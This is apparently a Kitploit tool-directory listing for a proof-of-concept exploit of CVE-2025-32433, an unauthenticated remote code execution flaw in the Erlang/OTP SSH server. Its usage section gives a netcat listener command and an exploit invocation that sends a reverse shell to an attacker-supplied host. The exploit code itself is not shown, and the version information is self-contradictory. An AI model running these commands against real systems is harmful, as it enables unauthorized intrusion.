Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE — PoC showing unauthenticated remote code execution in Erlang/OTP SSH server. By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials. | Kitploit
Tools/GitHubGitHub/dollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce
Payload GenerationVulnerability AnalysisExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubdollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce

CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

PoC showing unauthenticated remote code execution in Erlang/OTP SSH server. By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
321 year agoNot yet reviewed
Share

CVE-2025-32433 - Erlang/OTP SSH RCE PoC

CVE-2025-32433

Overview

PoC showing unauthenticated remote code execution in Erlang/OTP SSH server.
By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.

  • CVE: CVE-2025-32433
  • CVSS Score: 10.0 (Critical)
  • Affected Versions:
    • OTP-27.3.3 and earlier
    • OTP-26.2.5.11 and earlier
    • OTP-25.3.2.20 and earlier

This issue is patched in OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.

References

  • Unit42 Advisory
  • PoC Repository
  • NVD Entry

Usage

Listener Setup:

nc -lvnp 1234

alt text Run Exploit:

python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
  • --rhost : Target IP
  • --rport : Target SSH port
  • --lhost : Your IP for reverse shell
  • --lport : Your listener port

alt text

alt text

Disclaimer

This repository is for educational purposes only. Do not use this exploit against systems you do not own or have explicit permission to test. Misuse may be illegal and is strictly prohibited.

Download Tool